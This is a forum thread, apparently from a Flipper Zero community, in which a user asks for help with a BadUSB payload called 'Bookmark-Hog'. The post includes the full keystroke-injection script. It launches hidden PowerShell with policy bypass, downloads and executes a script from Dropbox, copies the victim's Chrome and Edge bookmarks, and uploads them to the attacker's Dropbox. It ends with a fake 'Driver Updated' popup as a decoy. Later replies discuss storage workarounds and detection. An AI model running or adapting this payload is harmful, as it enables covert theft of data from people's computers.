Configuring dropbox for bad usb

BadUSB
#1

Hello,

I’ve never used dropbox and I don’t know if I’m doing things wrong for my file configuration + API token doesn’t seem to work in the scripts.

For this script (payload.txt) :

REM     Title: Bookmark-Hog

REM     Author: atomiczsec

REM     Description: This payload is meant to exfiltrate bookmarks to the rubber ducky

REM     Target: Windows 10, 11

DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr https://www.dropbox.com/scl/fi/XXXXXXXXX/flipper.paper?dl=1&rlkey=XXXXXXXXXXXXdl=1; iex $pl
ENTER

REM     Remember to replace the link with your DropBox shared link for the intended file to download
REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

BH.ps1 :

#Bookmark-Hog

# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) {
     try {
         Write-Host "The chrome bookmark file has not been found. "
     }
     catch {
         throw $_.Exception.Message
     }
 }
 # Copy Chrome Bookmarks to Bash Bunny
  else {
     $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_bookmarks.txt"
     Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$env:tmp/$F1" 
 }

# See if file is a thing
Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf

#If the file does not exist, write to host.
if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) {
    try {
        Write-Host "The edge bookmark file has not been found. "
    }
    catch {
        throw $_.Exception.Message
    }
}
 # Copy Chrome Bookmarks to Bash Bunny
 else {
    $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt"
    Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" 
}

function DropBox-Upload {

    [CmdletBinding()]
    param (
        
    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
    [Alias("f")]
    [string]$SourceFilePath
    ) 
    $DropBoxAccessToken = "XXXXXXXXXXX"   # Replace with your DropBox Access Token
    $outputFile = Split-Path $SourceFilePath -leaf
    $TargetFilePath="/$outputFile"
    $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
    $authorization = "Bearer " + $DropBoxAccessToken
    $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
    $headers.Add("Authorization", $authorization)
    $headers.Add("Dropbox-API-Arg", $arg)
    $headers.Add("Content-Type", 'application/octet-stream')
    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
    }

DropBox-Upload -f "$env:tmp/$F1"
DropBox-Upload -f "$env:tmp/$F2"

$done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1)

I did create a file on my dropbox, I copy the link and paste it into the payloads: Dropbox - Invalid Link

And I created an API and copied the APP SECRET code (maybe you need to put the APP KEYS?), I tried it and it didn’t change.

The script outputs no errors, but the file receives nothing.

1 Like
#2

You may find someone here to help you but you would find much better help somewhere else. May I suggest you try the I am Jakoby Discord? If your goal is to do BadUSB stuff that’s the community for you. He also has a GitHub with a Flipper section.

#3

absolutely love IamJacoby to death but I havent been able to get most of his more advanced codes to work. Things like the ADV - Recons and Credz-plz I havent been able to figure out although they should be plug and play.

#4

I don’t like IAmJacoby (in this context). I know, very unpopular.

He is writing clear PS and know what he is doing. But when it comes to BadUSB, most (all?) scripts I have seen are like ‘download payload, execute’ …
Many companies I worked for are blocking Dropbox, WeTransfer, OneDrive by default. If I see these scripts, I think for a good reason.

After seeing this skripts I would adjust my IDS and not drop this attempts, I would forward them to deeper analysis.

So, because you are very limited in details, I would suggest, If the payload is available manual, and don’t blame BadUSB too soon.

2 Likes
#5

His payloads would be much more usable if they didn’t require the downloads. The easy solution would be if the Flipper could act as storage. Maybe a feature of Flipper one? If I had a power shell question he would be high on my list of people to ask.

#6

In fact, it can.

Here are two different approaches:

  1. Use the Flippers SPI and just leave the BadUSB after execute the script.
  2. Use a prepared (add file/folder) at the root or defined path) at a USB stick and insert it before or after the BadUSB payload is executed.

There is a more detailed discussion in this thread: Anyway to save files back to the Flipper using BadUSB? - #9 by emptythevoid

1 Like
#7

We should make a generic template for entering a ps1 file’s contents in-line into a powershell command to save it to a file. Slow, if long, but might avoid the download. I’m not sure how to use the Flipper CLI to access a file already stored on the device.

Unless the SD storage could be interfaced directly over the serial connections on the GPIO outside of BadUSB somehow.

Edit: I’ve not tried reading data via flippers CLI. Adding to research list.

1 Like
#8

You can read and write data in Flipper’s internal memory or SD card via CLI; it is storage read /.../path/to/file and storage write /.../path/to/file in simplest form, with int or ext for ... meaning internal and SD respectively.

1 Like
#9

But simple storage write is not available during BadUSB. That is the reason why we all put some thought in this

1 Like
#10

I wonder if an app could switch between modes. Data transfer would be slow but I suspect it would be worth it if you needed a small binary. The Flipper isn’t the best tool for this but it would be cool to extend it’s capabilities as a multi-tool. If MacGyver was still around he might have a Flipper next to his Swiss Army knife.